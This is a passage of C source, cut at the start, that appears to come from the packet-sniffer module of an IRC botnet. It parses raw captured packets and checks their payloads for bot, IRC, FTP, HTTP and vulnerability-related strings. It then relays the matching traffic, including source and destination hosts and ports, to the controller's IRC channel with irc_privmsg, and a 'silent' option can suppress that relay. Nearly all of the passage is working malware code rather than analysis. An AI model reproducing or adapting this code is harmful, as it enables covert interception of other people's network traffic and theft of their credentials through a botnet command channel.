				sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));

				// Payload start, assuming fixed-size headers; treated as a C string.
				szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
				for(int i=0; i<(int)strlen(szPacket); i++) {
					if(szPacket[i]=='\r') szPacket[i]='\x20';
					if(szPacket[i]=='\n') szPacket[i]='\x20';
				}

				// Classify and report; first match wins. Bot/IRC/FTP checks
				// exclude port 80, HTTP/VULN checks do not.
				if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) {
					_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
					if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
				}
				else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) {
					_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
					if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
				}
				else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) {
					_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
					if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
				}
				else if(IsSuspiciousHTTP(szPacket)) {
					_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
					if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
				}
				else if(IsSuspiciousVULN(szPacket)) {
					_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
					if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
				}
			}
		}
	}

	// Unreachable: the loop above never terminates.
	fclosesocket(sock);
	clearthread(sniff.threadnum);
	ExitThread(0);

	return 0;
}